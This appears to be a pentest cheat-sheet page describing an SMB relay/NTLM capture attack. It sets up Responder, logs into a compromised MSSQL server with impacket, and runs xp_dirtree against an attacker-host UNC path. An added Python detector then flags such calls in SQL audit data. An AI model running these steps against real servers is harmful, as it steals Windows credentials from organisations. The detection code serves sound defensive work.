SMB Relay Attack with MSSQL xp_dirtree Query to Steal NTLM Credential
Setup Request Capturer
Install the tools.
git clone https://github.com/lgandx/Responder
cd Responder/
pip3 install -r requirements.txt
sudo apt install impacket-scripts -y
Run Responder to capture the requests.
sudo python3 Responder.py -I eth0
Execution
Log in to the compromised MSSQL service with the MSSQL client.
sudo impacket-mssqlclient <user>:"<password>"@<target host> -p <port> -debug
After logging in, run the query to capture the SMB credential.
xp_dirtree '\\<attacker host>\test';
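Detection
On the defensive side, the same query can be searched for in SQL audit data. The following check is an added example, not part of the original page: it flags xp_dirtree calls whose argument is a UNC path to a host outside an allow-list. The function names, the sample statements and the allow-listed host are all constructed for illustration, and it assumes the audited statements are available as text.

```python
import re

# Quoted literals (group 1) are kept; /* */ and -- comments become a space.
_TOKEN = re.compile(r"('(?:[^']|'')*'|\"[^\"]*\")|/\*.*?\*/|--[^\n]*", re.S)
# xp_dirtree, optionally bracketed or called with parentheses, followed by a
# quoted UNC path; group 1 is the host in \\host\share.
_DIRTREE_UNC = re.compile(
    r"\bxp_dirtree\b\]?\s*\(?\s*N?['\"]\\\\([^\\'\"\s]+)", re.I)


def strip_comments(sql):
    """Remove SQL comments without touching string literals."""
    return _TOKEN.sub(lambda m: m.group(1) or " ", sql)


def unc_hosts(sql):
    """Return the lower-cased hosts named in xp_dirtree UNC arguments."""
    return [h.lower() for h in _DIRTREE_UNC.findall(strip_comments(sql))]


def review(statements, allowed_hosts=()):
    """Return (index, host) for xp_dirtree calls to hosts not allow-listed."""
    allowed = {h.lower() for h in allowed_hosts}
    return [(i, h) for i, s in enumerate(statements)
            for h in unc_hosts(s) if h not in allowed]


# Constructed sample statements, as they might appear in a SQL audit trail.
SAMPLE = [
    r"xp_dirtree '\\192.0.2.10\test';",
    r"EXEC master..xp_dirtree/**/N'\\files01.corp.example\backups', 1, 1",
    r"SELECT name FROM sys.databases -- xp_dirtree '\\192.0.2.10\x'",
    r'EXEC [master].[dbo].[xp_dirtree] "\\xn--host.example\s"',
    r"EXEC xp_dirtree 'C:\Temp'",
]
ALLOWED = {"files01.corp.example"}  # assumed legitimate file server

if __name__ == "__main__":
    for index, host in review(SAMPLE, ALLOWED):
        print(f"statement {index}: xp_dirtree to unexpected host {host}")
```

Calls that pass the path in a variable are not resolved by this check.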